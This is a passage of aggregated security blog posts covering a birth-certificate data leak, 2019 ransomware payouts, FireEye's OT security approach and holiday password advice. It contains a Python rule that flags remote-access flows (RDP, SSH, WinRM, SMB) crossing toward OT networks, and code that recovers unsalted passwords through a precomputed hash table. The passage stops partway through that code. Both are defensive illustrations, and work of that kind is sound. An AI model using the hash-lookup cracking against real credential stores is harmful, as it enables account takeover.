An unnamed organization that provides birth certificate services to U.S. citizens was contacted earlier this week in regard to a data leak of nearly 750,000 birth certificate applications. Within the applications was sensitive information for both the child applicant and their family members, which is highly sought after by scammers because it is relatively easy to open credit accounts for children with no prior credit history. Researchers are still waiting to hear back from the organization after finding this data dump in an unsecured Amazon Web Services bin.

The post Cyber News Rundown: Zeppelin Ransomware appeared first on Webroot Blog.

Weekly Update 169

I recorded this right before heading out for my final conference talk of the year at YOW! Melbourne where I was due to do the closing keynote of the event. That's now done, questions answered and beers drunk and I left the event feeling great. One of the things I get the most pleasure out of at conferences is hanging around talking to people so a big thanks to everyone who made the time today to stay back on a Friday evening and cap a very busy year of conferences off in this fashion. I'm going to leave that intro here, push this week's update then do it all again (hopefully also on time!) a week from now.

  1. Why No HTTPS? is getting a complete update (new data, new ranking criteria, still not enough HTTPS!)
  2. Go home GoGetSSL, your ad is drunk! (this is just complete and utter rubbish)
  3. Oh look, a kid's tracking watch with serious security vulnerabilities! (this is such an alarmingly predictable trend now)
  4. Sponsored by: Whois XML API: The top domain WHOIS, DNS, IP and Threat Intelligence solution provider for MDR, SIEM, digital forensics, and threat hunting.

P2PE v3.0: What Merchants Need to Know

The updates to the P2PE Standard and supporting program are part of the Council’s mission to evolve security standards and validation programs to support a range of environments, technologies and methodologies for achieving security. Ultimately, the updated PCI Point-to-Point Encryption (P2PE)® Standard and supporting program will result in more PCI P2PE® Solutions available to the marketplace. Here we cover key questions on what merchants need to know about P2PE v3.0.

P2PE v3.0: What Vendors and Assessors Need to Know

The updates to the P2PE Standard and supporting program are part of the Council’s mission to evolve security standards and validation programs to support a range of environments, technologies and methodologies for achieving security. Ultimately, the updated PCI Point-to-Point Encryption (P2PE)® Standard and supporting program will result in more PCI P2PE® Solutions available to the marketplace. We sit down with PCI SSC Vice President, Global Head of Programs Gill Woodcock to discuss the changes to the program.

5 Cybersecurity Predictions For 2020

While it may be true that nobody can predict the future, when it comes to cybersecurity you can give it a good go. By looking at the security developments that we have witnessed over the past few years, it is perfectly possible to forecast what is likely to happen in the near future.

Plus, with 2020 just around the corner, now is the time to do exactly that. Staying ahead of the game and doing all you can to avoid the risk of a cyber-attack is vital; and what better way is there to do just that than by preparing yourself in advance.

From the rise of 5G to the implementation of AI, here are five cybersecurity predictions for the coming year.

  1. Targeted ransomware.

While many people may see advances in technology as a good thing, that progress has also brought a rise in people’s susceptibility to cyber-attacks. As time has moved on, ransomware has become more and more targeted against specific businesses, and that doesn’t look set to change in 2020.

In fact, it looks like it’s going to get worse.

Rather than initiating a cyber-attack at the first available opportunity, attackers are now biding their time, gathering intelligence on their soon-to-be victims. In doing so, this enables them to inflict maximum disruption and scale up their ransom demands accordingly.

  2. Cyber-attack? Go phish.

A cyber resilience study by the FSB found there are an incredible seven million cyber-crimes against small businesses every year. A large proportion of these attacks came via what’s known as ‘phishing’ – a type of attack used by cybercriminals masquerading as a trusted person or business to steal data. Using a malicious link, these criminals dupe victims into opening a damaging email, instant message or text message.

As time moves forward, this type of attack is going to become more and more difficult to identify, especially when you consider the growing culture of big data. Email is currently the most popularly used channel for these kinds of attack but, over the next year, cybercriminals will likely start using alternative methods, such as social media messaging and gaming platforms, to target their attacks.

  3. More devices, more problems.

Next year looks set to be the year of 5G – a new data network promising higher internet speeds than ever before. While this is very exciting, the implementation of this network will also bring with it an explosion in the numbers of connected devices and sensors across the world – from connected car services to eHealth applications.

As a result, more data will be collected than ever before, which, in turn, will heighten the potential for data theft. To protect against this, cybersecurity firms will need to design effective systems capable of minimising the risk.

  4. Artificial aid.

Most of the pre-existing security solutions available today have been built using human logic. While that may have been fine in the past, as we move forward into an ever-growing technological world, keeping informed about the latest threats is almost impossible manually. Therefore, cybersecurity firms will need to think of new, advanced ways to combat threats – and fast.

Fortunately, this is where artificial intelligence (AI) comes in. Using AI in cyber security is a great way of identifying and responding to threats before they can spread. Utilising this in cyber defence mechanisms can and will need to take centre stage in the coming months, but firms will also need to remain cautious about its potential; cybercriminals will also be able to take advantage of AI, using innovative techniques to identify vulnerabilities and infiltrate networks.

  5. Head in the cloud.

The increasing reliance on public cloud infrastructure only heightens the likelihood of being targeted by cybercriminals. After all, the more exposed a business is, the more at risk it will be.

Therefore, over the next 12 months, many companies will begin looking at their existing data centre and think about creating a hybrid cloud environment for their public and private data. This, in turn, will improve their level of data protection and safeguard them from data loss instances, such as Google’s cloud outage earlier this year.

In conclusion…

Today’s interconnected world provides a wealth of opportunities for cybercriminals and cyber security firms alike. While this may make it sound like a bit of a cat and mouse contest, it’s anything but. By being able to predict what might happen in the coming year, cybersecurity providers can stay ahead of the game and use advanced threat intelligence to develop effective counteractive systems.

The post 5 Cybersecurity Predictions For 2020 appeared first on CyberDB.

Increasing Standards Alignment and Consistency

Increasing standards alignment and consistency is a core pillar in the PCI Security Standards Council’s strategic framework, which guides how the Council achieves its mission and supports the needs of the global payments industry. In this interview with PCI SSC Operations Officer Mauro Lance, we discuss this strategic pillar and how it’s shaping Council priorities.

This Year in Ransomware Payouts (2019 Edition)

Even though 2017 still remains the year when we saw the ransomware pandemic at its peak, cybercriminals will not stop these attacks on individuals and businesses anytime soon. Unfortunately, ransomware attacks continued to make headlines this year as well. So, in this article, I’m going to look at the highest ransomware payouts of 2019, what organizations paid the ransom, and explain why it’s never a good idea to pay.

But first, let’s start with some mind-blowing ransomware statistics from 2019.

Ransomware statistics in 2019

Here are the most shocking ransomware facts coming from 2019 alone:

  • Two-thirds of ransomware attacks targeted state and local governments.
  • 55% of SMBs from the US would pay hackers to recover their stolen data in ransomware attacks.
  • Over 500 US schools were affected by ransomware attacks in 2019.
  • Almost 70 US government organizations were infected with ransomware since January 2019.
  • A total of 140 US local governments, police stations, and hospitals have been infected with ransomware.
  • In the third quarter of 2019, the average ransomware payout increased to $41,000.

The most significant ransomware payouts of 2019

In the best-case scenario, victims of ransomware could simply wipe their systems and recover their data from offline backups. However, some organizations don’t keep any backups at all. Or worse, even if they do have copies of their data, sometimes they also end up being locked up by cybercriminals.

There are times when ransomware victims can decrypt their files with free ransomware decryption tools but sadly, there isn’t a decryptor available for all the ransomware strains out there. This sometimes leads to companies paying the ransom, being desperate to get their business back up and running.

Without further ado, below you will find the most significant ransomware payouts of 2019.

#6. Park DuValle Community Health Center, Kentucky, USA

June 2019

Amount paid: $70,000

In June 2019, Park DuValle Community Health Center had the medical records of almost 20,000 patients encrypted by ransomware and ended up paying the $70,000 ransom. The attack had left them locked out of their system for almost two months, impacting the health center’s medical records system and appointment scheduling tool.

For seven weeks, they had to record the patients’ information on pen and paper and ask them to speak from memory about their past treatments. The health care center basically had to operate on a walk-in basis since they were not able to schedule appointments or view any data.

“This is everything. This is medical records, contact information, insurance information, anything about a patient…everything is gone,” said Elizabeth Ann Hagan-Grigsby, CEO of Park DuValle. “The records involved are for past and present patients,” she continued.

This was the second time during the same year that Park DuValle was impacted by a ransomware attack. Back in April 2019, their systems had been locked down for about three weeks. That time, they had their data backed up, so they did not pay the ransom. The second time, however, they were unable to recover their data from the backups, so they decided to pay the ransom to restore it.

The amount was paid in 6 bitcoins (the equivalent of $70,000). Cybercriminals provided the encryption keys and Park DuValle was able to recover its data.

#5. Stratford City, Ontario, Canada

April 2019

Amount paid: $71,000

In April of this year, the City of Stratford also became a victim of a ransomware attack and chose to pay the ransom. According to the story published on Cybersecurity Insiders, the malware was installed on six of their physical servers and encrypted two virtual servers as well, leaving their sensitive data locked down.

Even though they received warnings from officials, they paid 10 bitcoins, which at the time of attack meant roughly $71,000. The security company they contacted was not able to recover their data and was only involved in forensics. Consequently, the city negotiated the price that needed to be paid for their information to become available again. Their cyber insurance covered $15,000 of the ransom.

It seems that no personally identifiable information data was compromised and revealed in this ransomware incident.

#4. La Porte County, Indiana, USA

July 2019

Amount paid: $130,000

Another victim of the Ryuk ransomware, La Porte County, Indiana, paid $130,000 to recover their data.

The attack happened on July 6 and was noticed right before it managed to spread to all of the network’s computers. The IT staff confined it to less than 7% of machines; however, two domain controllers were impacted and, as a result, network services became unavailable.

According to the source, the FBI and a forensic investigation firm attempted to recover the data without paying the ransom, but their efforts proved to be unsuccessful. $100,000 out of the $130,000 payment demand was covered by insurance.

Apparently, the county did have backup servers in place; however, they became infected by the ransomware as well.

The ransomware that affected La Porte County’s systems is allegedly Ryuk, the same strain that affected Lake City. It was called a “triple threat” because it originated from an Emotet infection that delivered the Trickbot trojan, which then launched Ryuk.

#3. Jackson County, Georgia, USA

March 2019

Amount paid: $400,000

Back in March, Jackson County had its network shut down by a ransomware attack, leaving only its website and 911 emergency system untouched. This meant they had to do their reports and bookings in pen and paper, just like they did before using computers became the norm.

Their officials contacted the FBI and hired a cybersecurity consultant. The security specialist negotiated with the cyber attackers and it was decided that Jackson County had to transfer $400,000 to receive the decryption key and gain access to their data once again.

“We had to make a determination on whether to pay. We could have literally been down months and months and spent as much or more money trying to get our system rebuilt”, said Kevin Poe, Jackson County Manager.

Apparently, the county’s network had been infected with the Ryuk ransomware strain, which as of now, does not have a free decryption tool available. According to experts, this type of ransomware had one of the most active campaigns in 2019, also affecting over 500 schools in the US.

Researchers are saying the Ryuk ransomware only launches after it completely spreads on the target’s network.

Here is what the Ryuk ransomware note looks like (the original post shows an image of the note here):

#2. Lake City, Florida, USA

June 2019

Amount paid: $500,000

A second city in Florida paralyzed by ransomware agreed to pay the ransom: 42 bitcoins ($500,000).

Even though their IT staff disconnected the systems within ten minutes of the attack’s detection, the ransomware managed to infect their network almost entirely. The police and fire departments were not affected, as they were running on a separate network. The people who needed to pay their bills could only do it in cash or money orders and they received handwritten receipts.

Cybercriminals reached out to the city’s insurance provider a week after the infection took place and the ransom payment of 42 bitcoins was negotiated. The money was paid from the city’s insurance.

Over 100 years’ worth of records (ordinances, meeting minutes, resolutions, and City Council agendas) were encrypted for almost a month. A few weeks after the ransom was paid, they did not even recover all of their data. What’s more, Lake City’s information technology director was accused of failing to secure the network and not recovering the data quickly enough and eventually lost his job.

Lake City was another victim of the Ryuk ransomware strain.

#1. Riviera Beach City, Florida, USA

May 2019

Amount paid: $600,000

This brings us to the biggest ransomware payout of 2019, which was made by Riviera Beach City in Florida.

Allegedly, right after an employee clicked on a phishing email link received on May 29, hackers managed to infiltrate the city’s network and lock it up. All of the city’s online systems went down, including email and even some phones, and on top of that, water utility pump stations were affected as well. As a result, payments could only be accepted in person or by mail (only in cash or by check) and communication was conducted by phone.

The City Council unanimously agreed to pay the ransom. The requested amount was 65 bitcoins, the equivalent of nearly $600,000. More than $300,000 from the city’s insurance policy was used to pay the ransom. The payment was officially made merely a few weeks after Riviera Beach agreed to spend around $1 million to replace the infected computer equipment.

Riviera Beach’s attack looked similar to what Jackson County experienced in March, so it seems they were yet another victim of the Ryuk ransomware strain.

The biggest ransom ever paid

Even though we’ve witnessed several major ransomware payouts this year, none of them was the all-time biggest.

In 2017, the Korean web hosting firm Internet Nayana received the largest ransom demand ever (a whopping $1.14 million), which they also ended up paying. During their negotiations, some of their data was permanently deleted. To make up for the incident, Nayana offered free hosting for life and refunds to its affected customers. So, of course, besides the actual payment, the ransomware attack involved additional costs and reputational damage.

Others refused to pay

Paying the ransom is not something that every ransomware victim considers. And sadly, data recovery costs for some organizations that decline the payment end up being much higher than the actual ransom. For instance, back in March 2018, the City of Atlanta was infected with the SamSam ransomware variant. Cybercriminals demanded a $52,000 ransom payment, however, Atlanta refused to pay and they had to spend $2.6 million to recover from the attack. So, since it has been proven that paying the ransom can be a lot cheaper than dealing with an attack’s aftermath, local governments are increasingly choosing to pay.

But here is an example of an organization that declined the ransomware payment.

Baltimore City’s ransomware resistance story

On May 7, 2019, cybercriminals froze around 10,000 Baltimore government computers and asked for a $100,000 payment in bitcoins. The city’s employees were locked out of their email accounts and citizens were unable to pay their bills. This wasn’t the first time the city became a victim of ransomware – in 2018, their 911 system was shut down for about a day by another similar attack and in both cases, they did not transfer money into the attackers’ Bitcoin wallet.

The second time, their computer systems were infected with the RobbinHood ransomware strain.

Bernard C. Jack Young, Mayor of Baltimore City, explained why they chose not to pay the ransom:

The city representative acknowledges that by paying the ransom there is no guarantee their systems will be unlocked and also emphasizes the fact that they are choosing not to encourage criminal behavior.

“Why don’t we just pay the ransom? I know a lot of residents have been saying we should’ve just paid the ransom or why don’t we pay the ransom?

Well, first, we’ve been advised by both the Secret Service and the FBI not to pay the ransom. Second, that’s just not the way we operate. We won’t reward criminal behavior.

If we paid the ransom, there is no guarantee they can or will unlock our system.

There’s no way of tracking the payment or even being able to confirm who we are paying the money to. Because of the way they requested payment, there’s no way of knowing if they are leaving other malware on our system to hold us for ransom again in the future.

Ultimately, we would still have to take all the steps we have taken to ensure a safe and secure environment. I’m confident we have taken the best course of action.” – Bernard C. Jack Young, Mayor of Baltimore City

US mayors have adopted a resolution against paying the ransom

A proposal to ban ransom payments, put forward by Bernard Young, the above-mentioned mayor of Baltimore City, has also been adopted. The resolution reads:

“Paying ransomware attackers encourages continued attacks on other government systems, as perpetrators financially benefit.”

“The United States Conference of Mayors has a vested interest in de-incentivizing these attacks to prevent further harm.”

“The United States Conference of Mayors stands united against paying ransoms in the event of an IT security breach.”

Although the adopted resolution doesn’t have any legal binding, it can be used to justify not paying the ransom in front of federal authorities and taxpayers.

Paying the ransom is a short-term solution

Ransomware payouts have become a highly controversial topic and for a good reason. Several questions arise when it comes to paying the ransom: Are you really going to recover your data? Where is your money actually going? Are you funding terrorist groups?

The FBI has explicitly stated that they do not support the practice and they urge organizations to report any ransomware incidents to law enforcement, no matter if they paid or not.

I strongly believe no one, be they consumers or organizations, should ever pay the ransom.

Here is why:

#1. There is no guarantee you will ever recover your files

In some cases, people still lost their data even though they paid the ransom. For instance, the GermanWiper ransomware deletes your files even if you do pay.

Also, malicious hackers actually like to be taken seriously, so if you think that by paying only a fraction of the requested amount you will get your data back (or at least some part of it), you are wrong. For example, the City of New Bedford, Massachusetts, was yet another government institution infected with the Ryuk ransomware. They tried to negotiate for $400,000 instead of $5.3 million, aiming to align the payment with the ones that were paid by cities hit by the same type of malware. However, their offer was declined.

#2. You are funding criminal organizations

Yes, it may be cheaper and faster to get your data back (if you are “lucky” enough) by paying the ransom. But are you really okay with transferring your money to shady hacking groups who may be using it for more malicious purposes?

#3. You are only encouraging this behavior

If organizations continue to pay the ransom, cybercriminals will not stop this practice anytime soon. In fact, it has already become a highly profitable underground business, also known as Ransomware as a Service (RaaS).

So, do you actually want to incentivize more and more attacks and contribute to the further propagation of the ransomware illegal industry?

Think about it this way. In the long run, if you’ve chosen to pay the ransom, you will definitely not save any money. Why not use the amount that you would have given to those ransomware attackers to improve your defenses instead?

How to Prevent Ransomware in Your Organization

Ransomware disasters can, fortunately, be avoided. As you’ve probably noticed from the ransomware incidents that I’ve listed, the best targets seem to be government entities that have outdated IT systems in place and that don’t always follow cybersecurity best practices.

Here is how you can stop ransomware from infecting your organization:

#1. Back up your data

I can’t stress this enough. The first and most important thing you can do is have copies of your data stored somewhere safe, where they won’t get infected as well. What’s more, make sure that your backup system actually works and test it frequently.

#2. Watch out for excessive admin rights inside your organization

Sometimes, ransomware can prove to be a result of abused privileged accounts (malware propagation is often linked to compromised credentials that belong to admin accounts).

So, be certain that your organization runs on the principle of least privilege and the Zero Trust model. In short, be careful whom you grant admin rights to within your organization. A tool such as Thor AdminPrivilege™ can help you easily escalate and de-escalate privileges and when used in tandem with our other security solutions, you will get notified when threats are discovered and more than that, admin rights will be automatically de-escalated on your compromised accounts.

#3. Use security tools specifically designed to stop ransomware

For instance, a product like Thor Foresight Enterprise is properly equipped to protect your organization against ransomware. First of all, it instantly blocks any incoming attacks (for example, associated with malicious URLs) and secondly, it contains a patch management tool, created to help you close all vulnerabilities related to outdated systems and software.

#4. Train your users

Last, but not least, your users should be able to recognize the signs of cyberattacks. I often hear IT admins struggling with compromised accounts and malware infections that happen due to users who keep clicking on phishing links and following the instructions (for example, submitting their login credentials).


All in all, 2019 has shown us that ransomware is still a lucrative business for cybercriminals. The organizations that are choosing to pay the ransom only worsen the situation, setting high expectations for future ransomware attackers. So, the bottom line is this: if you are ever faced with this tough decision – to pay or not to pay – think about what paying actually means.

Are you in favor of paying the ransom? Let me know your thoughts in the comments section below.

The post This Year in Ransomware Payouts (2019 Edition) appeared first on Heimdal Security Blog.

Collecting and Crafting User Information from LinkedIn

Justin Angel // Penetration testing and red team engagements often require operators to collect user information from various sources that can then be translated into inputs to support social engineering and password attacks. LinkedIn is obviously a prime source for this type of information since users can associate themselves with a particular company. Assuming we […]

The post Collecting and Crafting User Information from LinkedIn appeared first on Black Hills Information Security.

The FireEye Approach to Operational Technology Security

Today FireEye launches the Cyber Physical Threat Intelligence subscription, which provides cyber security professionals with unmatched context, data and actionable analysis on threats and risk to cyber physical systems. In light of this release, we thought it would be helpful to explain FireEye’s philosophy and broader approach to operational technology (OT) security. In summary, combined visibility into both the IT and OT environments is critical for detecting malicious activity at any stage of an OT intrusion. The FireEye approach to OT security is to:

Detect threats early using full situational awareness of IT and OT networks.

The surface area for most intrusions transcends architectural layers because at almost every level along the way there are computers (servers and workstations) and networks using the same or similar operating systems and protocols as used in IT, which serve as an avenue of approach for impacting physical assets or control of a physical process. The oft-touted air gap is in many cases a myth.

There is often a singular focus from the security community on industrial control system (ICS) malware largely due to its novel nature and the fact that there have been very few examples found. This attention is useful for a variety of reasons, but disproportionate to the actual methods of the intrusions where ICS-tailored malware is used. In the attacks utilizing Industroyer and TRITON, the attackers moved from the IT network to the OT network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz extracts, remote desktop sessions and other well-documented, easily detected attack methods were used throughout these intrusions and found at every level of the IT, IT DMZ, OT DMZ and OT environments.

We believe that defenders and incident responders should focus much more attention on intrusion methods, or TTPs, across the attack lifecycle, most of which are present on what we call “intermediary systems”—predominately networked workstations and servers using operating systems and protocols that are similar to or the same as those used in IT, which are used as stepping-stones to gain access to OT assets. This approach is effective because almost all sophisticated OT attacks leverage these systems as stepping stones to their ultimate target.

To illustrate this philosophy, we present some new concepts for approaching OT threats, including the Funnel of Opportunity for OT Threat Detection and the Theory of 99, as well as practical examples derived from our analysis and incident response work. We hope these ideas challenge others in the security community to put forward new ideas and drive discussion and collaboration. We strive for a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time and their freedom.

The "Funnel of Opportunity" Highlights the Value of Detecting OT Attacks In "Intermediary Systems"

Over the past 15 years of responding to and analyzing many of the most important threats in IT and OT, FireEye observed a consistent pattern across almost all OT security incidents: There is an inverse relationship between the presence of an attacker’s activities and the severity of consequence to physical assets or processes. The attack lifecycle when viewed like this begins to take on a “funnel” shape, representing both the breadth of attacker footprint and the breadth of detection opportunity for any given level. Similarly, from top to bottom we represent the timeline of the intrusion and its proximity to the physical world. The bottom is the cross-over of impact from the cyber world to the physical world.

Figure 1: The Funnel of Opportunity for OT Threat Detection

In the early stages of the attack lifecycle, the intruder spends prolonged periods of time targeting components such as servers and workstations across IT and the IT DMZ. Identifying threat activity at this architectural level is relatively straightforward given that dwell time is high, threat actors often leave visible traces, and there are many mature security tools, services and other capabilities designed to detect this activity. While it is difficult to anticipate or associate this early intrusion activity in IT layers with more complex OT targeted attacks, IT networks remain the best zone to detect attacks.

In addition to being relatively easy to detect, early attacker activity also presents a very low risk of negative impact to OT networks. This is primarily because OT networks are commonly segmented, often with an OT DMZ separating them from IT, limiting attacker access to the industrial process. Also, targeted OT attacks commonly require threat actors to acquire abundant process documentation to determine how to cause a desired outcome. While some of this information may be available in IT networks, planning this type of attack would almost certainly require further process visibility only available in the OT network. This is why, as the intrusion progresses and the attacker gets closer or gains access to OT networks, the severity of possible negative outcomes becomes proportionally higher. However, the activity becomes more difficult to detect as the attacker’s footprint grows smaller and there are fewer security tools available to defenders.

The TRITON and Industroyer Attacks Exemplify This Phenomenon

Figure 2 shows an approximate representation of endpoints that were compromised across the architecture of victim organizations during the TRITON and Industroyer attacks. The Funnel of Opportunity is located in the intersection between the two triangles. It is here where the balance between attacker presence and operational consequence of an intrusion makes it easier and more meaningful for security organizations to identify threat activity. As a result, threat hunting close to the OT DMZ and DCS represents the most efficient approach as the detectable features of the intrusion are still present and the severity of potential consequences of the intrusion is high, but still not critical.

Figure 2: Approximate representation of endpoints compromised during the TRITON and Industroyer attacks

In both the TRITON and Industroyer incidents, the threat actor followed a consistent pattern traversing the victims’ architecture from IT networks, through the OT network, and ultimately reaching the physical process controls. In both incidents, we observed that the actor moved through segmented architectures using computers located in different zones. While we only illustrated two incidents in this blog post, we highlight that movement across zones leveraging computers has also been observed in every public OT security incident to date.

The Theory of 99: Almost All Threat Activity Happens in Windows and Linux Systems

FireEye’s unique visibility into the full attack lifecycle of thousands of intrusions from both independent research and first-hand incident response experience has enabled us to support this theory with real-world data, some of which we share here. FireEye has consistently identified similar TTPs leveraged by threat actors regardless of their target industry or ultimate goals. We believe that visibility into network traffic and endpoint behaviors is among the most important components of IT security. These components are also critical in preventing pivots to key assets in the OT network and detecting threat activity once it does reach OT.

Our observations can be summarized in what we call the Theory of 99, which states that in intrusions that go deep enough to impact OT:

  • 99% of compromised systems will be computer workstations and servers
  • 99% of malware will be designed for computer workstations and servers
  • 99% of forensics will be performed on computer workstations and servers
  • 99% of detection opportunities will be for activity connected to computer workstations and servers
  • 99% of intrusion dwell time happens in commercial off-the-shelf (COTS) computer equipment before any Purdue level 0-1 devices are impacted

As a result, there is often a significant overlap across TTPs utilized by threat actors targeting both IT and OT networks.

Figure 3: TTPs seen across both IT and OT incidents

Figure 3 presents a summary of TTP overlaps between TRITON, Industroyer, and some relatively common activity from cybercrime group FIN6. FIN6 is a group of intrusion operators who have compromised multiple point-of-sale (POS) environments to steal payment card data and sell it on the dark web. While the motivations and ultimate goal of the threat actors that developed TRITON and Industroyer differ significantly from FIN6, the three actors share common TTPs, including the use of Meterpreter, compromising dual-homed systems, leveraging RDP to establish remote connections and so forth. The overlap in tools and TTPs across actors interested in IT and OT should be of no surprise. The use of IT tools for OT compromises directly corresponds to a trend best known as IT/OT convergence. As IT equipment increasingly becomes integrated in OT systems and networks to improve efficiency and manageability, we can expect threat actors to be able to leverage networked computers as a conduit to reach industrial controls.

Drawing parallels between intrusions into high security environments, we can gain insight into actor behaviors and identify detection opportunities earlier in the attack lifecycle. Intelligence on intrusions across various sectors can be useful in highlighting which common and emerging adversary tools and TTPs are likely to be used in tailored attacks against organizations with OT assets.
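The detection opportunity described above (remote-access sessions stepping from IT, through the DMZs, toward OT, often via dual-homed hosts) can be expressed as a small hunting rule over network flow records. The following is an added example written for this page, not FireEye's code or tooling; the Purdue-style zone subnets, the host inventory and the flow lines are all constructed, and the flow format ("timestamp src dst dport proto") is an assumed simplification of what a real sensor would emit.

```python
import ipaddress

# Constructed zone map (assumed addressing, not from the post). Ordering runs
# from least to most sensitive, i.e. down the "funnel" toward the process.
ZONES = {
    "IT": ipaddress.ip_network("10.1.0.0/16"),
    "IT_DMZ": ipaddress.ip_network("10.2.0.0/16"),
    "OT_DMZ": ipaddress.ip_network("10.3.0.0/16"),
    "OT": ipaddress.ip_network("10.4.0.0/16"),
}
ZONE_RANK = {"IT": 0, "IT_DMZ": 1, "OT_DMZ": 2, "OT": 3}

# Interactive/remote-access services commonly used to hop between zones.
REMOTE_ACCESS_PORTS = {3389: "RDP", 22: "SSH", 5985: "WinRM", 445: "SMB"}

# Constructed flow records: "timestamp src dst dport proto"
FLOWS = [
    "2019-12-01T10:00:00Z 10.1.5.20 10.1.5.30 445 tcp",   # IT -> IT, same zone
    "2019-12-01T10:05:00Z 10.1.5.20 10.2.0.10 3389 tcp",  # IT -> IT DMZ over RDP
    "2019-12-01T10:20:00Z 10.2.0.10 10.3.0.5 3389 tcp",   # IT DMZ -> OT DMZ over RDP
    "2019-12-01T10:40:00Z 10.3.0.5 10.4.1.9 22 tcp",      # OT DMZ -> OT over SSH
    "2019-12-01T11:00:00Z 10.4.1.9 10.3.0.5 443 tcp",     # OT -> OT DMZ, HTTPS, upward
]

# Constructed host inventory: hostname -> interface addresses
INVENTORY = {
    "eng-ws01": ["10.2.0.10", "10.3.0.7"],  # two interfaces in two zones
    "hmi01": ["10.4.1.9"],
}


def zone_of(ip: str) -> str:
    """Return the zone name for an address, or UNKNOWN if it is unmapped."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "UNKNOWN"


def parse_flow(line: str) -> dict:
    ts, src, dst, dport, proto = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto}


def find_zone_crossings(lines) -> list:
    """Flag remote-access flows that move from a less to a more sensitive zone."""
    alerts = []
    for line in lines:
        f = parse_flow(line)
        src_zone, dst_zone = zone_of(f["src"]), zone_of(f["dst"])
        if src_zone == dst_zone or f["dport"] not in REMOTE_ACCESS_PORTS:
            continue
        if ZONE_RANK.get(dst_zone, -1) > ZONE_RANK.get(src_zone, -1):
            alerts.append({
                "ts": f["ts"], "src": f["src"], "src_zone": src_zone,
                "dst": f["dst"], "dst_zone": dst_zone,
                "service": REMOTE_ACCESS_PORTS[f["dport"]],
            })
    return alerts


def stepping_stone_chains(alerts) -> list:
    """Link alerts whose destination later becomes a source, giving host paths."""
    chains = []
    for a in alerts:
        for chain in chains:
            if chain[-1]["dst"] == a["src"] and chain[-1]["ts"] <= a["ts"]:
                chain.append(a)
                break
        else:
            chains.append([a])
    return [[c[0]["src"]] + [step["dst"] for step in c] for c in chains]


def find_dual_homed(inventory) -> dict:
    """Hosts with interfaces in more than one zone: the 'intermediary systems'."""
    found = {}
    for host, ips in inventory.items():
        zones = {zone_of(ip) for ip in ips}
        if len(zones) > 1:
            found[host] = sorted(zones)
    return found


if __name__ == "__main__":
    crossings = find_zone_crossings(FLOWS)
    for a in crossings:
        print(f'{a["ts"]} {a["service"]} {a["src"]} ({a["src_zone"]}) -> {a["dst"]} ({a["dst_zone"]})')
    print("paths toward OT:", stepping_stone_chains(crossings))
    print("dual-homed hosts:", find_dual_homed(INVENTORY))
```

The rule deliberately ignores traffic that flows back up the funnel and traffic within a zone, so that what remains is the downward stepping-stone pattern; in practice the zone map would come from the site's own network documentation and the alert would be enriched with the dual-homed host list before an analyst sees it.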

FireEye Services, Intelligence, and Technology Provide Unparalleled Protection In IT and OT

While the FireEye approach to OT security detailed in this blog post emphasizes the criticality of “intermediary systems” when defending OT, we do not want to downplay the importance of the OT expertise and technology needed to respond to the most critical 1% of threat activity that does impact control systems. OT is in our DNA at FireEye: FireEye Mandiant’s OT practice has been one of the leading industry voices over the past six years, and the FireEye Cyber Physical Intelligence offering is the most recent evolution of the heritage of Critical Intelligence—the first commercial OT threat intelligence company founded in 2009.

Figure 4: FireEye OT-specific offerings

We believe that sharing our philosophy for OT security and highlighting FireEye’s comprehensive OT security capabilities will help organizations look at this security challenge from a different angle and take tangible steps forward to build a robust, all-encompassing security program. Figure 4 maps FireEye’s OT security offerings against the NIST Cybersecurity Framework’s Five Functions, matching FireEye services to the lifecycle of an organization’s cyber security risk management.

If you are interested in learning more or purchasing FireEye OT-focused solutions, you can reach out here: FireEye OT Solutions.

The big task for CIOs in 2020: Bringing security and IT operations together

The first step in bridging the gap starts with understanding the problem. IT and security operations have worked in silos for decades, so one might think “If it ain’t broke, don’t fix it.” But it is, in fact, broken, and there is little awareness of the impact caused by the fragmentation.

According to a recent study conducted by Forrester on behalf of endpoint security company Tanium, 67% of IT leaders surveyed admitted that driving collaboration between the two groups is a challenge and that the rift widens an already big gap in visibility and makes resolving issues harder.


Don’t gift cyber attackers access to your organisation this Christmas

Stock up on sprouts, hang the decorations and prepare for a barrage of cyber attacks, because the Christmas season is in full swing.

December is a busy time for cyber criminals, as they look to take advantage of understaffed IT departments and employees who are distracted by tight deadlines, Christmas parties and the upcoming break.

Let’s take a look at some of the most common mistakes organisations make and how to address them. Some are quick fixes that you can sort out before you go away for the holidays, whereas others require a refined, systematic approach to information security.

1. Weak passwords

Hackers can crack passwords in a variety of ways:

  • Dictionary attacks: Hackers load a text file containing a list of words (usually from a dictionary) into a cracking application and run it against the user accounts the application has located.
  • Rainbow tables: Most modern systems store passwords as a hash. This means that even if hackers reach the area or file that stores the passwords, they find hashes rather than plain text. A rainbow table helps reverse a hash by comparing the stored hash with a precomputed list of hashed dictionary entries.
  • Brute force: The hacker tries common passwords in the hope of finding a match.
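To make the rainbow-table point concrete, here is an added example (written for this page, not from the original post) that contrasts a precomputed lookup against unsalted SHA-256 hashes with a salted, deliberately slow PBKDF2 hash. The wordlist is a constructed stand-in for a real dictionary; the iteration count is an assumption chosen for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a dictionary file.
WORDLIST = ["password", "123456", "letmein", "qwerty", "welcome1"]

DEFAULT_ITERATIONS = 100_000  # assumed work factor for this demo


def unsalted_hash(password: str) -> str:
    """The weak scheme: a bare SHA-256 of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_rainbow_lookup(words) -> dict:
    """Precomputed hash -> plaintext table, computed once and reused forever."""
    return {unsalted_hash(w): w for w in words}


def crack_unsalted(stored_hex: str, table: dict):
    """Against unsalted hashes a table lookup recovers the password instantly."""
    return table.get(stored_hex)


def hash_password(password: str, salt: bytes = None,
                  iterations: int = DEFAULT_ITERATIONS):
    """Salted, iterated PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = DEFAULT_ITERATIONS) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison


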